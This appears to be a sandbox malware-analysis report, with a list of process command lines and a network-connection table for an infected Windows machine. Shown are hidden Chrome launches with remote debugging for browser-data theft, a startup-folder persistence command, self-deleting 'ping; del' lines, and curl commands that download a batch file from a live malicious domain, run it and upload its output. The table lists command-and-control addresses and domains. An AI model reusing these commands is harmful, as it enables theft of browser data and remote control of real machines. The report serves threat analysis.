C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\Admin\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5348,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:8

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x120,0xf4,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0x114,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Windows\explorer.exe

explorer.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 82.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.135.234:443 gateway.discord.gg tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 209.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 234.135.159.162.in-addr.arpa udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
FR 194.59.30.220:1336 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 220.30.59.194.in-addr.arpa udp
RS 79.101.0.33:443 79.101.0.33 tcp
US 8.8.8.8:53 33.0.101.79.in-addr.arpa udp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
RU 31.41.244.10:80 31.41.244.10 tcp
CN 124.221.184.239:5443 tcp
US 8.8.8.8:53 10.244.41.31.in-addr.arpa udp
FR 194.59.30.220:1336 tcp
DE 185.218.125.157:21441 tcp
RU 31.41.244.12:80 31.41.244.12 tcp
US 8.8.8.8:53 12.244.41.31.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.75.238:443 drive.google.com tcp
US 162.159.135.234:443 gateway.discord.gg tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 c.pki.goog udp
FR 142.250.179.67:80 c.pki.goog tcp
US 8.8.8.8:53 238.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 o.pki.goog udp
FR 142.250.179.67:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 225.74.250.142.in-addr.arpa udp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.136.232:443 discord.com tcp
FR 142.250.75.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.113:80 r11.o.lencr.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 125.21.192.23.in-addr.arpa udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 113.135.221.88.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 24.249.124.192.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
RU 31.41.244.9:80 31.41.244.9 tcp
US 8.8.8.8:53 9.244.41.31.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 pinlateofficial.xyz udp
US 8.8.8.8:53 pinlateofficial.xyz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 grahm.xyz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 jirafasaltas.fun udp
DE 116.203.10.31:443 grahm.xyz tcp
US 172.67.193.102:443 jirafasaltas.fun tcp
US 8.8.8.8:53 31.10.203.116.in-addr.arpa udp
US 8.8.8.8:53 www.srbreferee.com udp
US 8.8.8.8:53 102.193.67.172.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 www.srbreferee.com udp
SE 93.188.2.53:80 www.srbreferee.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 ftpcluster.loopia.se udp
SE 93.188.1.110:21 ftpcluster.loopia.se tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 88.221.134.137:80 e5.o.lencr.org tcp
SE 93.188.1.110:49997 ftpcluster.loopia.se tcp
US 8.8.8.8:53 infect-crackle.cyou udp
US 172.67.216.167:443 infect-crackle.cyou tcp
US 8.8.8.8:53 53.2.188.93.in-addr.arpa udp
US 8.8.8.8:53 110.1.188.93.in-addr.arpa udp
US 8.8.8.8:53 137.134.221.88.in-addr.arpa udp
SE 93.188.1.110:64971 ftpcluster.loopia.se tcp
SE 93.188.1.110:59024 ftpcluster.loopia.se tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 se-blurry.biz udp
SE 93.188.1.110:64322 ftpcluster.loopia.se tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 167.216.67.172.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
SE 93.188.1.110:57677 ftpcluster.loopia.se tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 steamcommunity.com udp
SE 93.188.1.110:61844 ftpcluster.loopia.se tcp
FR 23.217.238.254:443 steamcommunity.com tcp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 254.238.217.23.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
SE 93.188.1.110:60992 ftpcluster.loopia.se tcp
SE 93.188.1.110:62943 ftpcluster.loopia.se tcp
DE 185.218.125.157:21441 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 66.45.226.53:7777 66.45.226.53 tcp
RU 178.215.90.34:80 tcp
RU 83.217.192.54:22 tcp
RU 83.217.192.194:8080 tcp
RU 89.169.0.117:80 tcp
RU 89.169.7.192:8083 tcp
RU 83.217.197.147:80 tcp
RU 89.169.1.148:22 tcp
RU 83.217.192.194:8080 tcp
DE 185.218.125.157:21441 tcp
RU 89.169.3.120:554 tcp
RU 178.215.90.34:80 tcp
RU 89.169.0.161:8001 tcp
RU 89.169.6.18:1723 tcp
RU 89.169.41.25:8001 tcp
RU 89.169.41.148:465 tcp
RU 89.169.23.199:21 tcp
RU 89.169.2.220:4662 tcp
RU 89.169.40.150:8291 tcp
RU 213.108.19.30:445 tcp
RU 89.169.0.234:8291 tcp
RU 83.217.206.25:2000 tcp
RU 178.215.76.25:80 tcp
RU 178.215.69.100:21 tcp
RU 89.169.41.233:139 tcp
RU 89.169.41.133:8888 tcp
RU 89.169.40.79:3389 tcp
RU 178.215.78.66:23 tcp
RU 83.217.195.153:179 tcp
US 8.8.8.8:53 53.226.45.66.in-addr.arpa udp
US 8.8.8.8:53 34.90.215.178.in-addr.arpa udp
US 8.8.8.8:53 147.197.217.83.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 30.19.108.213.in-addr.arpa udp
US 8.8.8.8:53 25.206.217.83.in-addr.arpa udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 218.172.154.94.in-addr.arpa udp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
RU 178.215.75.170:80 tcp
RU 83.217.206.25:2000 tcp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 infect-crackle.cyou udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 172.67.216.167:443 infect-crackle.cyou tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 54.192.217.83.in-addr.arpa udp
US 8.8.8.8:53 170.75.215.178.in-addr.arpa udp
US 8.8.8.8:53 124.191.200.185.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
FR 23.217.238.254:443 steamcommunity.com tcp
SE 93.188.1.110:49810 ftpcluster.loopia.se tcp
N/A 224.0.0.251:5353 udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 fightlsoser.click udp
US 8.8.8.8:53 ipinfo.io udp
US 172.67.213.48:443 fightlsoser.click tcp
US 34.117.59.81:443 ipinfo.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 48.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
FR 23.217.238.254:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 162.159.135.234:443 gateway.discord.gg tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
FR 194.59.30.220:1336 tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
CN 113.45.142.235:8888 tcp
DE 185.218.125.157:21441 tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.136.232:443 discord.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
NL 149.154.167.99:443 t.me tcp
FR 194.59.30.220:1336 tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 185.218.125.157:21441 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
